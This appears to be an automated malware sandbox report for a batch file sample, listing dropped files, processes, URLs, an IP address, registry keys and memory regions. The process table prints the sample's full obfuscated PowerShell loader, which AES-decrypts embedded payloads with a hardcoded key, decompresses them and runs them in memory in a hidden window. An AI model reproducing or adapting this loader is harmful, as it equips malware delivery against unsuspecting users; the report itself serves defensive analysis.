Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
15.bat
|
DOS batch file, ASCII text, with very long lines (51246), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owwgvgmx.sep.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rm4u2mft.m10.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlkrsuot.rle.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xenaccby.0uo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\MyData\DataLogs.conf
|
ASCII text
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with very long lines (2132), with CRLF line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\15.bat" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\15.bat"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes',
''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB',
''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb',
''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr',
''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI',
''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg',
''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function
mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object
System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC
(FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD,
6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null);
"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 5 hidden URLs, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
193.222.96.128
|
unknown
|
Germany
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum 64-bit
|
Version
|
||
|
HKEY_CURRENT_USER\SOFTWARE\3F8E9C71781CC56F1C2A
|
82BCF176D913F0776418319F42DC5D04ED32E1FA7228CC3802D41E62B5147256
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FFD9B7AB000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
98AA34E000
|
stack
|
page read and write
|
||
|
1BB684D4000
|
trusted library allocation
|
page read and write
|
||
|
1BB684B3000
|
trusted library allocation
|
page read and write
|
||
|
98A93FE000
|
stack
|
page read and write
|
||
|
1BB662A0000
|
trusted library allocation
|
page read and write
|
||
|
1BB64A60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
98A9579000
|
stack
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
1BB66E32000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
|
98A98FB000
|
stack
|
page read and write
|
||
|
1BB663C6000
|
heap
|
page read and write
|
||
|
1BB64A70000
|
heap
|
page readonly
|
||
|
1BB76AB4000
|
trusted library allocation
|
page read and write
|
||
|
1BB64A00000
|
heap
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
1BB768F1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
98A977E000
|
stack
|
page read and write
|
||
|
1BB7EBC8000
|
heap
|
page read and write
|
||
|
1BB7697E000
|
trusted library allocation
|
page read and write
|
||
|
1BB7EBB7000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
1BB66390000
|
heap
|
page read and write
|
||
|
1BB668E0000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
7DF46D3C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
98A947F000
|
stack
|
page read and write
|
||
|
98A927F000
|
stack
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
1BB647C0000
|
heap
|
page read and write
|
||
|
1BB7EB79000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
1BB7E8FD000
|
heap
|
page read and write
|
||
|
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BB64850000
|
heap
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
98A987E000
|
stack
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
1BB7EA04000
|
heap
|
page read and write
|
||
|
1BB64893000
|
heap
|
page read and write
|
||
|
1BB663CB000
|
heap
|
page read and write
|
||
|
1BB7EA6D000
|
heap
|
page read and write
|
||
|
1BB668B0000
|
heap
|
page execute and read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BB668A7000
|
heap
|
page execute and read and write
|
||
|
1BB7EA3D000
|
heap
|
page read and write
|
||
|
1BB64A40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
1BB76962000
|
trusted library allocation
|
page read and write
|
||
|
1BB66975000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
|
98A9678000
|
stack
|
page read and write
|
||
|
1BB64A80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
1BB66395000
|
heap
|
page read and write
|
||
|
1BB76BEB000
|
trusted library allocation
|
page read and write
|
||
|
1BB64868000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
1BB7EB04000
|
heap
|
page read and write
|
||
|
1BB668A0000
|
heap
|
page execute and read and write
|
||
|
1BB68487000
|
trusted library allocation
|
page read and write
|
||
|
1BB67F1F000
|
trusted library allocation
|
page read and write
|
||
|
1BB647D0000
|
heap
|
page read and write
|
||
|
1BB66D68000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
1BB7EA68000
|
heap
|
page read and write
|
||
|
98A96F9000
|
stack
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BB66CD7000
|
trusted library allocation
|
page read and write
|
||
|
98A92FF000
|
stack
|
page read and write
|
||
|
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
|
98A937D000
|
stack
|
page read and write
|
||
|
1BB64AF5000
|
heap
|
page read and write
|
||
|
1BB66E2E000
|
trusted library allocation
|
page read and write
|
||
|
1BB7EBD1000
|
heap
|
page read and write
|
||
|
1BB67832000
|
trusted library allocation
|
page read and write
|
||
|
98A8F8E000
|
unkown
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
1BB668F1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
1BB64820000
|
heap
|
page read and write
|
||
|
1BB64AB0000
|
trusted library allocation
|
page read and write
|
||
|
98A94FE000
|
stack
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BB64907000
|
heap
|
page read and write
|
||
|
1BB7EA32000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
1BB66CD5000
|
trusted library allocation
|
page read and write
|
||
|
1BB7EA00000
|
heap
|
page read and write
|
||
|
1BB64AF0000
|
heap
|
page read and write
|
||
|
98AA2CE000
|
stack
|
page read and write
|
||
|
1BB7EA0C000
|
heap
|
page read and write
|
||
|
1BB7EB00000
|
heap
|
page read and write
|
||
|
1BB7EA20000
|
heap
|
page read and write
|
||
|
1BB76901000
|
trusted library allocation
|
page read and write
|
||
|
1BB663A0000
|
heap
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
|
1BB66320000
|
heap
|
page execute and read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
1BB66398000
|
heap
|
page read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
1BB7EA47000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
98A95F8000
|
stack
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
98A97FE000
|
stack
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
1BB7EA45000
|
heap
|
page read and write
|
||
|
1BB7EAD7000
|
heap
|
page read and write
|
||
|
1BB6482B000
|
heap
|
page read and write
|
||
|
1BB66AAE000
|
trusted library allocation
|
page read and write
|
||
|
1BB6850E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
1BB7EB42000
|
heap
|
page read and write
|
||
|
98A8FCF000
|
stack
|
page read and write
|
||
|
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
98A8F03000
|
stack
|
page read and write
|
||
|
1BB647F0000
|
heap
|
page read and write
|
||
|
1BB66890000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
1BB7EB64000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
1BB66BD5000
|
trusted library allocation
|
page read and write
|
There are 137 hidden memdumps, click here to show them.